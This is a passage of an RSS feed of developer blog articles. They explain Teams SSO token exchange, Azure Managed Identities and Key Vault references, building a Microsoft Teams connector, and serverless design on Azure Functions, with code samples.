        "grant_type": "urn:ietf:params:oauth:grant-type:jwt-bearer",&lt;br&gt;
        "client_id": process.env.CLIENTID,&lt;br&gt;
        "client_secret": process.env.CLIENTSECRET,&lt;br&gt;
        "scope": "user.read",&lt;br&gt;
        "requested_token_use": "on_behalf_of",&lt;br&gt;
        "assertion": idToken&lt;br&gt;
    }&lt;br&gt;
}, (error,response,body) =&amp;gt; {&lt;br&gt;
    const access_token = JSON.parse(body)["access_token"];&lt;br&gt;
    })&lt;br&gt;
})&lt;br&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h3&gt;
  
  
  You only get a certain set of scopes
&lt;/h3&gt;

&lt;p&gt;When using SSO with Teams tabs, the token issued will only contain five scopes: &lt;code&gt;user.read&lt;/code&gt;, &lt;code&gt;email&lt;/code&gt;, &lt;code&gt;profile&lt;/code&gt;, &lt;code&gt;openid&lt;/code&gt; and &lt;code&gt;offline_access&lt;/code&gt;. Oftentimes this is not enough, for example when your tab wants to learn more about the context of the user or wants to let them work with their Graph data. Before you can exchange this token for an access_token with further scopes in your backend, the user has to initially consent that you are allowed to use this data. For implementing this, you can refer to &lt;a href="https://docs.microsoft.com/en-us/microsoftteams/platform/tabs/how-to/authentication/auth-aad-sso#asking-for-additional-consent-using-the-auth-api"&gt;this documentation&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>microsoftteams</category>
      <category>security</category>
      <category>webdev</category>
      <category>azureactivedirectory</category>
    </item>
    <item>
      <title>Low code, ultimate security - Secure Azure with Managed Identities</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Wed, 06 Nov 2019 22:34:39 +0000</pubDate>
      <link>https://forem.com/urmade/low-code-ultimate-security-secure-azure-with-managed-identities-m09</link>
      <guid>https://forem.com/urmade/low-code-ultimate-security-secure-azure-with-managed-identities-m09</guid>
      <description>&lt;h1&gt;
  
  
  Are your apps really secure?
&lt;/h1&gt;

&lt;p&gt;TL;DR: Azure Managed Identities are awesome! Give your services an Identity, configure permissions between resources and let Azure handle all access management for you. How to implement this? Here you go.&lt;/p&gt;

&lt;p&gt;Can you remember your last side project? For me, it is always a time of hype. I am a cloud enthusiast, so I always have plenty of ideas on what to do. Let's go with Kubernetes, but Serverless seems pretty cool too, and didn't they blog lately about that new feature in Web Apps that sounded fun? Maybe I just bring in all of them?&lt;br&gt;
And while building a concept and coding the logic of your side project is a real joy, there comes this point where I always start wondering: "Wait, maybe that thing I built could be cool for others as well. Okay, then I definitely have to spend more time on the UI. And I have to make it more secure. I have to make all of it more secure. Why did I choose to bring in all these components?"&lt;/p&gt;

&lt;p&gt;Securing the interaction between different resources in a product can be time-consuming. You have to connect all resources by hand, keep secrets up to date in your environment variables, and usually build dependencies in your code on some sort of security service or library (in the Azure context, let's take Key Vault for storing your secrets and certificates as an example). You start investing a lot of time in your security assets, and that's time you could spend on value-adding features instead. &lt;/p&gt;

&lt;p&gt;But luckily, Azure is here to help: With Managed Identities, you can assign an Azure Active Directory Identity to many of your Azure services and give them permissions to other resources, just as you would do with users. That way, you don't have to care about access management, and Azure routes and resolves all access requests internally for you.&lt;/p&gt;

&lt;h2&gt;
  
  
  What are these managed identities really?
&lt;/h2&gt;

&lt;p&gt;If you have never worked with Azure Active Directory (AAD for short) before, here's the summary: AAD is Microsoft's identity management service. That means every user, all of their permissions, and a lot of other objects in your organization are listed there, and with every sign-in to a resource, AAD knows exactly what you can or cannot do. Nearly all of Microsoft's first-party tools, as well as a lot of third-party tools, use AAD for their identity management. For example, you can thank AAD for keeping your Office secure and making sure only you see your OneDrive files.&lt;/p&gt;

&lt;p&gt;And this same Azure Active Directory can be used to regulate service-to-service communication as well: Just give your service an identity (let's call it Alex) and specify all other resources that Alex can talk to.&lt;/p&gt;

&lt;p&gt;Okay, how can Alex do that? &lt;/p&gt;

&lt;h2&gt;
  
  
  Bringing it to life: Assigning an identity
&lt;/h2&gt;

&lt;p&gt;When we gave our service its identity, we created two things in AAD: an application registration and a service principal. An application registration basically just tells AAD: "Hey, here is some service that wants to call some of your APIs" (this isn't the most accurate or complete description ever, but it serves our purpose. If you want to go deeper, &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/app-objects-and-service-principals"&gt;start here&lt;/a&gt;). With that application registration also comes a service principal object. This is a modified version of a basic user in AAD (like Alice and Bob), with the restriction that it can only talk to other Azure resources. This service principal is attached to our application registration and linked to its assigned managed identity. If the managed identity is deleted, the linked service principal is automatically removed as well.&lt;/p&gt;

&lt;p&gt;Assigning an identity can be done entirely from the Azure portal. As we will see in the next chapter, there are two different kinds of identities, but the process is very similar: Navigate to the resource you want to assign an identity to, choose the &lt;em&gt;Identity&lt;/em&gt; tab in the resource navigation, and click on &lt;em&gt;Status: On&lt;/em&gt; or &lt;em&gt;Add&lt;/em&gt; (depending on which kind of identity you want to assign). The whole process is very well documented in &lt;a href="https://docs.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=dotnet#adding-a-system-assigned-identity"&gt;this article&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Who am I? User-assigned vs. System-assigned identities
&lt;/h2&gt;

&lt;p&gt;When it comes to managed identities, we can choose from two different creation methods. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;System-assigned&lt;/strong&gt; identities are tied directly to one specific Azure resource. You can enable one with two clicks in every Azure resource that supports managed identities. If the resource is deleted, the identity is removed as well.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;User-assigned&lt;/strong&gt; identities, on the other hand, can be connected to multiple Azure resources. They are created like every other Azure resource and can be used to group multiple resources together so that they share identical rights and permissions. When one of these resources is deleted, the user-assigned identity continues to exist.&lt;/p&gt;

&lt;h2&gt;
  
  
  Making it talk: Requesting access to other resources
&lt;/h2&gt;

&lt;p&gt;First, you have to configure which resources our newly created identity (called Alex, as you might remember) has access to. If you have ever assigned access rights to your co-workers on a specific Azure resource, this is a piece of cake for you. You just do the following:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Navigate to the resource that you want Alex to access&lt;/li&gt;
&lt;li&gt;Click on "Access Control (IAM)"&lt;/li&gt;
&lt;li&gt;Click on "Add", and then "Role assignment"&lt;/li&gt;
&lt;li&gt;Give it whatever role is suitable for your plans, and enter Alex's service principal ID under "Select"&lt;/li&gt;
&lt;li&gt;Hit save&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And just like that you are all set! For screenshots and a more elaborate description of the process, go through &lt;a href="https://docs.microsoft.com/en-us/azure/role-based-access-control/role-assignments-portal"&gt;this documentation&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Now we can go to phase two: Giving Alex an access token to actually call other services. Depending on what kind of Azure service Alex is, we have different ways to achieve this (and this article would blow up if we covered all of them). But to clarify the concept, let's look at the flow for Virtual Machines.&lt;/p&gt;

&lt;h2&gt;
  
  
  Coming to life: Implementing Managed Identity calls on Virtual Machines
&lt;/h2&gt;

&lt;p&gt;For those of you who are already familiar with OAuth2 login flows, this flow should feel somewhat familiar (but with far fewer security measures involved): After we set up our service principal from the Azure portal, we call a certain URL and get back a JSON Web Token with which we can call other services. In detail:&lt;/p&gt;

&lt;p&gt;From your VM, call &lt;code&gt;http://169.254.169.254/metadata/identity/oauth2/token&lt;/code&gt;. Provide these query parameters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;api-version&lt;/code&gt;: Specifies the internal API version to use for token acquisition. Must be &lt;code&gt;2018-02-01&lt;/code&gt; or higher.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;resource&lt;/code&gt;: The API that you want to call with the acquired token. This could be, for example, &lt;code&gt;https://management.azure.com/&lt;/code&gt; if you want to call the Azure API, or &lt;code&gt;https://vault.azure.net/&lt;/code&gt; for access to Key Vault.&lt;/li&gt;
&lt;li&gt;(Optional) &lt;code&gt;client_id&lt;/code&gt;: If you're using user-assigned identities, you must include this parameter with the client ID of your service principal. &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Why don't we use any secrets or any other verification to get a token? Well, we are already on the Virtual Machine when we request the token. You can therefore treat this call as machine-internal, just as if we were accessing the file system. &lt;/p&gt;

&lt;p&gt;After you have successfully made the request, you will receive a JSON Web Token. This token can be used as authorization to call the service specified by &lt;code&gt;resource&lt;/code&gt;. And now you're done! Just one single call from your server for all Azure services, instead of implementing huge, service-specific authorization SDKs!&lt;/p&gt;
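&lt;p&gt;To make this concrete, here is a small sketch of that token flow in Node.js (assuming Node 18+ with built-in fetch; the helper names are made up for illustration). Note that the metadata endpoint also expects a &lt;code&gt;Metadata: true&lt;/code&gt; header:&lt;/p&gt;

```javascript
// Sketch of the token request described above; helper names are hypothetical.
function buildTokenRequestUrl(resource, clientId) {
  const base = "http://169.254.169.254/metadata/identity/oauth2/token";
  const params = new URLSearchParams({ "api-version": "2018-02-01", resource: resource });
  if (clientId) {
    // Only needed for user-assigned identities
    params.append("client_id", clientId);
  }
  return base + "?" + params.toString();
}

// Usage on the VM itself: fetch the token, then put it into the
// Authorization header of your later calls to the target service.
async function getManagedIdentityToken(resource) {
  const response = await fetch(buildTokenRequestUrl(resource), {
    headers: { Metadata: "true" } // required by the Instance Metadata Service
  });
  const body = await response.json();
  return body.access_token;
}
```

&lt;p&gt;Since this endpoint only answers from inside the VM, the URL-building part is the piece you can try anywhere.&lt;/p&gt;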

&lt;p&gt;To learn more about other resources and how to obtain an access token, check out &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/managed-identities-azure-resources/overview#how-can-i-use-managed-identities-for-azure-resources"&gt;this documentation&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Native security: Key Vault references
&lt;/h2&gt;

&lt;p&gt;This is already pretty cool. But it gets even better. A common scenario for service-to-service communication in Azure is retrieving secrets. You wouldn't want to store app passwords or certificates in plain text on your server, and leaving them hardcoded as environment variables is still a huge administrative overhead (and all your app developers can see the secrets). So it is a good idea to outsource all secrets to one place, and Azure Key Vault is exactly that place. It stores secrets and certificates encrypted by a physical TPM module (if you have never heard of that, don't worry: it is just as secure as it sounds), with strong auditing and features like auto-rotation. &lt;/p&gt;

&lt;p&gt;The only drawback: How can we access these secrets if they are not on our server? Ironically, we can use REST: Just call a URL, authorize with a &lt;strong&gt;secret&lt;/strong&gt; and get your other secret back. Do you spot the loophole? We trade all of our secrets for one master secret, but in the end we still have to manage a secret.&lt;/p&gt;

&lt;p&gt;For Azure App Services, Managed Identities give us a very elegant way of fixing this. Just configure a Managed Identity for your App Service, give that identity access to your Key Vault, and use a &lt;em&gt;Key Vault reference&lt;/em&gt; to access your secrets. What is a Key Vault reference? In the environment variables of your App Service (in Azure, they are called App settings), instead of configuring &lt;code&gt;SECRET:pq289gni...&lt;/code&gt;, you can put in a reference. It looks like this: &lt;code&gt;SECRET:@Microsoft.KeyVault({secretUri})&lt;/code&gt;. With the right permissions in place (provided through Managed Identities), your App Service now automatically pulls the secret from Key Vault at startup, and the secret is never exposed anywhere in the whole process.&lt;/p&gt;
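&lt;p&gt;As a tiny illustration, such a reference value can be assembled like this (a sketch; &lt;code&gt;SecretUri&lt;/code&gt; is one documented form of the reference, and the vault URL below is hypothetical):&lt;/p&gt;

```javascript
// Sketch: building a Key Vault reference for an App Service app setting.
// secretUri is assumed to be the full URI of a secret in your vault.
function keyVaultReference(secretUri) {
  return "@Microsoft.KeyVault(SecretUri=" + secretUri + ")";
}

// Example app setting value for a hypothetical vault:
// keyVaultReference("https://myvault.vault.azure.net/secrets/DbPassword")
// returns "@Microsoft.KeyVault(SecretUri=https://myvault.vault.azure.net/secrets/DbPassword)"
```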

&lt;p&gt;I hope you are now equipped with the knowledge to build super-robust apps on Azure. If you have any questions or some information is still missing, please leave some feedback!&lt;/p&gt;

</description>
      <category>security</category>
      <category>azure</category>
      <category>identity</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Building a Microsoft Teams connector</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Sat, 02 Nov 2019 20:19:16 +0000</pubDate>
      <link>https://forem.com/urmade/building-a-microsoft-teams-connector-2bhp</link>
      <guid>https://forem.com/urmade/building-a-microsoft-teams-connector-2bhp</guid>
      <description>&lt;h1&gt;
  
  
  What is a connector?
&lt;/h1&gt;

&lt;p&gt;Teams connectors (or more specifically, Office connectors) are inbound webhooks into Microsoft Teams. This means that a connector gives you a URL with which you can post messages into a specified channel at any time. &lt;br&gt;
GitHub, for example, uses this mechanism to notify your team when a new pull request is accepted into a certain repository, and Trello can notify the team about upcoming deadlines. Besides MS Teams, connectors can also be used in Outlook to notify users via mail.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--F0fTzmmE--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/g3kyov569piuujnlbv3d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--F0fTzmmE--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/g3kyov569piuujnlbv3d.png" alt="Office 365 Connectors" width="880" height="217"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;The basic functionality of a connector&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;A connector consists (from a developer's perspective) of two parts: a configuration page and a backend. The configuration page is displayed directly in Teams and should be used to specify the content that is posted to the channel. So you could, for example, specify which task lists you want to monitor, which types of messages you want to be notified about, or how often you would like to receive notifications. The second part is the backend. Here you should store the webhook URL and send POST requests to that URL to post messages into the channel.&lt;/p&gt;

&lt;h2&gt;
  
  
  Configuring your connector for Teams
&lt;/h2&gt;

&lt;p&gt;Besides the implementation itself, you will also need a Teams app that the user can install in order to access your connector in the first place. And to create a Teams app, you should use a Teams app. More specifically, App Studio lets you click through the app creation process and gives you a manifest.json file that contains your app configuration. Although you only need that manifest.json in the end (and you could write it from scratch if you're into that), it is always advisable to use App Studio. It offers all configuration options available for the manifest and has built-in error checking.&lt;/p&gt;

&lt;p&gt;You will also need to register your connector in the &lt;a href="https://aka.ms/connectorsdashboard"&gt;Office 365 connector dashboard&lt;/a&gt;. Doing so gives you a connector ID that identifies your connector and gives your users more information about the organization that wants to post content into their channel. Besides some explanatory text for your connector, two settings are especially important: the configuration page (we will hear more about that in the next paragraph) and enabling actions on your card. If you do not enable actions, buttons that post a message back to your app won't work (for example, you're posting a message into Teams that reminds the user of an important task, and you want to offer a button saying "Mark as completed"). Once you have successfully registered the connector, download the Teams manifest and start right away!&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--_Bh6-7uy--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/1zjrzsm8uuvt8s0glaf7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--_Bh6-7uy--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/1zjrzsm8uuvt8s0glaf7.png" alt="Teams Connector Dashboard" width="880" height="1231"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;You only have to provide this information to register your connector&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The configuration page is an HTML page that you can use to ask users which data they want to get notified about in their channel. Specifically, you can ask for any information you need from the user, and based on this information you can determine which data the channel just subscribed to and therefore which data you will send to the channel. Most of the following guide is dedicated to writing a configuration page, so let's jump right in.&lt;/p&gt;

&lt;h2&gt;
  
  
  Developing your first connector
&lt;/h2&gt;

&lt;p&gt;For your first connector, you will need only a configuration page. You can print the webhook URL directly to the configuration page, and then use tools like &lt;a href="https://www.getpostman.com"&gt;Postman&lt;/a&gt; to send messages to your specified channel. You can find the code for this step &lt;a href="https://github.com/Urmade/TeamsConnectorDemo/tree/MVP"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;To get our webhook URL, we have to register the connector within the channel. We need a Teams app, and this Teams app needs a URL to your configuration page (note: localhost won't work; for development you should use tools like &lt;a href="https://ngrok.com/download"&gt;ngrok&lt;/a&gt;). To interact with Teams from the frontend, Teams offers the so-called Teams JavaScript SDK. We will need the SDK in order to tell Teams whether our configuration was successful. As we only want a webhook URL in the first step, we don't need any input elements in the HTML. We only need a container to display the webhook URL later on:&lt;br&gt;
&lt;code&gt;&amp;lt;span id="url"&amp;gt;&amp;lt;/span&amp;gt;&lt;/code&gt;. &lt;br&gt;
Now we can start working with the Teams context. Before using the Teams SDK, you always have to initialize it first. You can do this by calling &lt;br&gt;
&lt;code&gt;microsoftTeams.initialize();&lt;/code&gt;.&lt;br&gt;
Configuring a connector on the Teams side consists of four steps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Providing additional information about your connector&lt;/li&gt;
&lt;li&gt;Receiving the webhook&lt;/li&gt;
&lt;li&gt;Telling Teams what to do when the user hits "Save"&lt;/li&gt;
&lt;li&gt;Enabling the "Save" button&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To give Teams more information about your connector, you should call &lt;code&gt;microsoftTeams.settings.setSettings({...})&lt;/code&gt; with the settings JSON object as the parameter. You need to provide these settings:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;entityId&lt;/code&gt;: A unique ID of your connector in the channel. It is needed when you want to reference your connector from within Teams (e.g. you want to create a link to the connector configuration)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;configName&lt;/code&gt;: The string that will be displayed to users when they look up their existing connector configurations in Teams&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;contentUrl&lt;/code&gt;: The URL which is called whenever the user wants to update the configuration&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;All together, the call could look like this:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;microsoftTeams.settings.setSettings({
    entityId: "sampleConn",
    configName: "sampleConfig",
    contentUrl: "https://e6d84899.ngrok.io"
});
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Next, we have to receive the webhook URL from Teams. This follows a very familiar pattern: We call &lt;code&gt;microsoftTeams.settings.getSettings((settings) =&amp;gt; {...})&lt;/code&gt;. In Teams, the settings for your webhook are created as soon as you call setSettings(), so only then can we get the connector settings. getSettings() requires a callback that the settings are passed to. For the moment we only want to print the webhook URL from the settings to the screen, so the call looks like this:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;microsoftTeams.settings.getSettings(s =&amp;gt; {
    document.getElementById("url").innerText = s.webhookUrl;
});
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Though we now have everything we came for, the webhook isn't activated yet. To activate it, we have to save our configuration. This process consists of two steps: First, we specify what should happen when the user clicks on "Save". To do so, we call &lt;code&gt;microsoftTeams.settings.registerOnSaveHandler((saveEvent) =&amp;gt; {...})&lt;/code&gt;. In the actual handler, we need to at least call &lt;code&gt;saveEvent.notifySuccess();&lt;/code&gt; to tell Teams that our saving process has completed successfully. Second, we have to make the "Save" button clickable by calling &lt;code&gt;microsoftTeams.settings.setValidityState(true);&lt;/code&gt;. All together, our calls look like this:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;microsoftTeams.settings.registerOnSaveHandler((saveEvent) =&amp;gt; {
    saveEvent.notifySuccess();
});
microsoftTeams.settings.setValidityState(true);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;And here you go, your first connector is complete! Open Postman, copy your webhook URL into the URL bar, set your body type to &lt;code&gt;application/json&lt;/code&gt; and POST this message:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
"text": "Hi I'm a connector test!"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Your first connector message now is available in your channel!&lt;/p&gt;
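&lt;p&gt;If you prefer scripting over Postman, the same POST can be sent from Node.js. This is a sketch assuming Node 18+ with built-in fetch; &lt;code&gt;webhookUrl&lt;/code&gt; stands for the URL printed by your configuration page:&lt;/p&gt;

```javascript
// Sketch: sending a connector message programmatically instead of via Postman.
function buildConnectorMessage(text) {
  // The minimal payload accepted by a connector webhook
  return JSON.stringify({ text: text });
}

async function postToChannel(webhookUrl, text) {
  const response = await fetch(webhookUrl, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: buildConnectorMessage(text)
  });
  return response.status;
}
```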

&lt;h2&gt;
  
  
  Securing the connector: Adding authentication
&lt;/h2&gt;

&lt;p&gt;Now that you have played around with your first connector, you have got the idea behind connectors. We can start thinking about building a connector that could actually run in a production environment. For the configuration page, this means one thing above all: security. We have to make absolutely sure that only authorized users are able to configure connectors. To do this, you should leverage Azure Active Directory (AAD) and log your users in before they are able to make any configurations. An implementation of this step can be found &lt;a href="https://github.com/Urmade/TeamsConnectorDemo/tree/Authentication-MVP"&gt;here&lt;/a&gt;. &lt;/p&gt;

&lt;p&gt;On the HTML side, you have to insert a new button into your page. Teams spawns a popup to authenticate the current user, and popups that are not triggered by a direct user interaction are usually blocked. In the example, the default text is hidden in another div for UI reasons. This leaves you with this code:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;button id="login" onclick="login()"&amp;gt;Authenticate before configuring the connector!&amp;lt;/button&amp;gt;
&amp;lt;div id="success" style="display: none;"&amp;gt;
    Copy your webhook URL from here to POST messages in this channel: &amp;lt;span id="url"&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
    Don't forget to click on "Save" to activate your connector.
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Triggering a login in the frontend SDK is pretty intuitive. Just call &lt;code&gt;microsoftTeams.authentication.authenticate({...})&lt;/code&gt; and specify the login URL, the proportions of the popup, and success / failure callbacks. The only thing you should keep in mind is that the login URL must be on the same domain as the one your configuration page is hosted on. So you can't redirect directly to &lt;code&gt;example.secureLogin.com&lt;/code&gt; if your page runs on &lt;code&gt;mysite.com&lt;/code&gt;; you have to redirect to &lt;code&gt;mysite.com/login&lt;/code&gt; first. &lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;function login() {
        microsoftTeams.authentication.authenticate({
            url: window.location.origin + "/login",
            width: 600,
            height: 535,
            successCallback: function (result) {
                console.log(result);
                configure();
            },
            failureCallback: function (reason) {
                console.error(reason);
            }
        });
    }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;When a user hits the &lt;code&gt;/login&lt;/code&gt; endpoint, the example just redirects that user to the Azure Active Directory login page without any further checks. Creating a backend to support AAD logins is a (quite intuitive and fast) topic on its own, so to not bloat this article, you can find instructions for that &lt;a href="https://dev.to/urmade/the-hands-on-beginners-guide-to-azure-active-directory-4ija"&gt;here&lt;/a&gt;. In the end, we get an access_token that contains some user information and enables you to call Microsoft services to get further information about the user. Though many tutorials obtain this token directly on the client side, this isn't a wise idea. Access tokens are valid for an hour, and whoever possesses such a token has access to sensitive user information. And as the client (more specifically, a browser) can have all kinds of vulnerabilities (for example, malicious add-ins) that could steal anything that goes over the wire, you shouldn't hand out such a sensitive token to your users. &lt;/p&gt;

&lt;p&gt;But how do we pass anything to the configuration page anyway? Right now you have a popup where the user can log in, but this isn't your config page. The answer again lies in the Teams SDK: When the login process has finished, you have to redirect your user to a new HTML page that you host. On this page, you initialize the Teams SDK and call &lt;code&gt;microsoftTeams.authentication.notifySuccess({...})&lt;/code&gt; or &lt;code&gt;microsoftTeams.authentication.notifyFailure()&lt;/code&gt;, depending on whether the login process succeeded. You could pass an access token as well as an ID token to the client, but in the example implementation all this sensitive information is kept server-side. So you can send back just a placeholder indicating that everything succeeded (given that we won't need to persist the token anyway, you don't need to give a session ID to the client). The example uses &lt;a href="https://ejs.co/"&gt;ejs&lt;/a&gt;, a very straightforward rendering engine for Node.js that allows you to execute JavaScript while rendering HTML pages. The final code could look like this:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;microsoftTeams.initialize();

        //notifySuccess() closes the popup window and passes the specified information to the configuration page
        //Usually you would pass the tokens in here, but as we don't want to expose user tokens to the client and we only need proof that the user is who they claim to be (authentication), we leave these fields empty
        &amp;lt;% if(successfulAuth) { %&amp;gt;
        microsoftTeams.authentication.notifySuccess({
        idToken: "N/A",
        accessToken: "N/A",
        tokenType: "N/A",
        expiresIn: "N/A"
    })
    &amp;lt;% } else { %&amp;gt;   
        microsoftTeams.authentication.notifyFailure("User could not be verified");
    &amp;lt;% } %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Calling this will close the popup and pass the information specified to the client. And just like that, you authenticated your user and made your app a lot safer!&lt;/p&gt;

&lt;h2&gt;
  
  
  Further steps to an awesome connector
&lt;/h2&gt;

&lt;p&gt;If you now send the webhook URL to your server instead of just displaying it to the user, you have taken every step to create a solid base for your actual connector logic. Now the actual fun part starts: You have to implement some configuration options for the user to choose from when setting up the connector, store the webhook URL in your backend, and trigger some event mechanism whenever a user should be notified. For storing your connector, you should keep a few things in mind:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Next to the webhook URL, you should also keep the channel ID to eventually check (via &lt;a href="https://developer.microsoft.com/en-us/graph"&gt;Microsoft Graph&lt;/a&gt;) the members of the channel.&lt;/li&gt;
&lt;li&gt;In your backend, you need a scalable and efficient process to trigger messages to the webhook URL. Utilize the &lt;a href="http://www.grahambrooks.com/event-driven-architecture/patterns/notification-event-pattern/"&gt;Notification Event Pattern&lt;/a&gt; or the &lt;a href="https://www.tutorialspoint.com/design_pattern/observer_pattern.htm"&gt;Observer Pattern&lt;/a&gt; and services like &lt;a href="https://docs.microsoft.com/en-us/azure/azure-functions/"&gt;Azure Functions&lt;/a&gt; or &lt;a href="https://azure.microsoft.com/en-us/services/event-grid/"&gt;Azure Event Grid&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
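&lt;p&gt;The observer idea from the list above can be sketched in a few lines. This is a hypothetical in-memory registry; in production, the subscriptions would live in a database and &lt;code&gt;notify&lt;/code&gt; would POST to the stored webhook URL:&lt;/p&gt;

```javascript
// Sketch: an in-memory observer registry for connector subscriptions.
// Each subscription keeps the channel ID and webhook URL from the configuration step.
class ConnectorRegistry {
  constructor() {
    this.subscriptions = [];
  }
  subscribe(channelId, webhookUrl) {
    this.subscriptions.push({ channelId: channelId, webhookUrl: webhookUrl });
  }
  // Invokes notify(subscription, event) for every registered channel
  publish(event, notify) {
    this.subscriptions.forEach(function (subscription) {
      notify(subscription, event);
    });
  }
}
```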

&lt;p&gt;Congratulations, you are now equipped to build an awesome connector and keep your Teams up-to-date about anything that happens in your application!&lt;/p&gt;

</description>
      <category>microsoftteams</category>
      <category>webdev</category>
      <category>tutorial</category>
      <category>javascript</category>
    </item>
    <item>
      <title>Serverless prototyping - A case study</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Sat, 26 Oct 2019 23:02:20 +0000</pubDate>
      <link>https://forem.com/urmade/serverless-prototyping-a-case-study-2laa</link>
      <guid>https://forem.com/urmade/serverless-prototyping-a-case-study-2laa</guid>
<description>&lt;p&gt;Serverless computing is an exciting way of hosting your apps. It offers you unmatched scalability while making you pay only for what you really used. In this article, I will go through a case study on what an architecture for a serverless web app prototype could look like (on Microsoft Azure), some best practices, and what it would cost you in the end.&lt;/p&gt;

&lt;h2&gt;
  
  
  What will be built?
&lt;/h2&gt;

&lt;p&gt;So you decided to use serverless computing, but what now? The good thing first: You're not really forced into any particular programming language. The Azure Functions runtime offers some preferred languages, but due to its open-source character you could modify it to work with any language of your choice.&lt;/p&gt;

&lt;p&gt;For your web app itself, you will most likely have a front-end and a back-end. On the front-end side, you gain the most flexibility in terms of where to run your app (mobile, desktop, web, …) with the classic HTML / CSS / JS stack. Plus, if you're fairly new to programming and don't have deep knowledge of another specific language, those three are very easy to get into. For the backend, you can leverage the rich ecosystems of Node.js, .NET, Java or Python to get started quickly.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to design your functions?
&lt;/h2&gt;

&lt;p&gt;Now to the interesting part: What could an architecture for our app look like? How do we define a function in our system? Is the operation a+b worth its own function, or should we split on logical entities (e.g. search all entries of a database table, bring them into the right format and then return them)? As always, the truth is somewhere in the middle. &lt;br&gt;
From a hosting perspective, we have two metrics that determine how expensive a function will be for us: execution time and memory consumption. So when splitting functions, it should always be our goal to minimize those two factors overall while keeping network traffic at a fair level, without introducing excessive communication latency into the system. &lt;br&gt;
And note the "minimize overall": With every communication between two functions, you bring in a sending (packaging) and a receiving (parsing) step, as well as securing operations, all of which takes time (negligible at first, but it can become a factor if overdone).&lt;/p&gt;

&lt;p&gt;We can at least optimize for the networking and deployment bit by identifying functions that are highly dependent on each other. To understand why this is important, we have to peek "under the hood" of Azure Functions: &lt;br&gt;
Whenever we deploy our Function App code to Azure, that code is stored somewhere with a reference to an ever-active URL that marks our Function App API endpoint. When someone hits that API, Azure starts looking for an available VM where it can deploy your app. Once found, it takes your code, puts it onto that VM and starts your main process. Once this is done, all the functions in your app are available. &lt;br&gt;
When traffic gets too high and the compute power of the current VM isn't enough to run your app, the code gets deployed to a second VM and requests get distributed by a load balancer.&lt;br&gt;
